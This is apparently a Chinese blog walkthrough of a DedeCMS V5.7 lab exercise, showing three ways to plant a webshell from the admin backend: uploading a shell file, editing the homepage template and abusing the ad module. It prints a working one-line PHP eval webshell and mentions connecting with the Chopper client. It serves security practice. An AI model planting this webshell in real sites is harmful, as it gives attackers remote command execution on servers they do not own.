DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
真真-真真22 分钟前
WebXR
linux·运维·服务器
hao_wujing25 分钟前
网络安全攻防演练中的常见计策
安全·web安全
轩辰~1 小时前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
燕雀安知鸿鹄之志哉.1 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
Mitch3111 小时前
【漏洞复现】CVE-2015-5531 Arbitrary File Reading
web安全·elasticsearch·网络安全·docker·漏洞复现
wanhengidc1 小时前
短视频运营行业该如何选择服务器?
运维·服务器
s_yellowfish2 小时前
Linux服务器pm2 运行chatgpt-on-wechat,搭建微信群ai机器人
linux·服务器·chatgpt
vvw&2 小时前
如何在 Ubuntu 22.04 上安装 Ansible 教程
linux·运维·服务器·ubuntu·开源·ansible·devops
我一定会有钱2 小时前
【linux】NFS实验
linux·服务器
王铁柱子哟-2 小时前
解决 正在下载VS Code 服务器... 问题
运维·服务器